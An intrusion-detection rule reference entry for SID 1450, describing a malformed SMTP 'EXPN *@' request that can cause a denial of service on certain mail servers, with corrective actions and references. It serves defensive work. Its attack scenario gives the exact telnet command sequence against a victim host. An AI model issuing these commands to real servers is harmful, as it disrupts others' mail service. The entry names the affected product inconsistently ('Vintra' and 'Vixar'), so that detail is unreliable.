GEN:SID 1:1450
Message SMTP expn *@
Summary This event is generated when an attempt is made to send a malformed
request to an SMTP server which may cause a Denial of Service.
Impact Denial of Service (DoS)
Detailed Information The SMTP standard command "EXPN" is provided by servers to help find
user e-mail accounts.

A malformed request to certain versions of Vintra MailServer can cause a
DoS against that server.
Affected Systems Vixar MailServer for Windows
Attack Scenarios The attacker needs to connect to a vulnerable server and issue the
following commands.

>telnet victim.foo.com 25
>helo victim
>mail from:doctor
>rcpt to:evil
>expn *@
Ease of Attack Simple. No exploit software required.
Corrective Action Disable the EXPN command on the SMTP server.

Upgrade to the latest non-affected version of the software
Additional References NT Bugtraq:
http://marc.theaimsgroup.com/?l=ntbugtraq&m=90222454131610&w=2

Command Reference:
http://www.ntmail.co.uk/kb.htm?q=980
Rule References cve: 1999-1200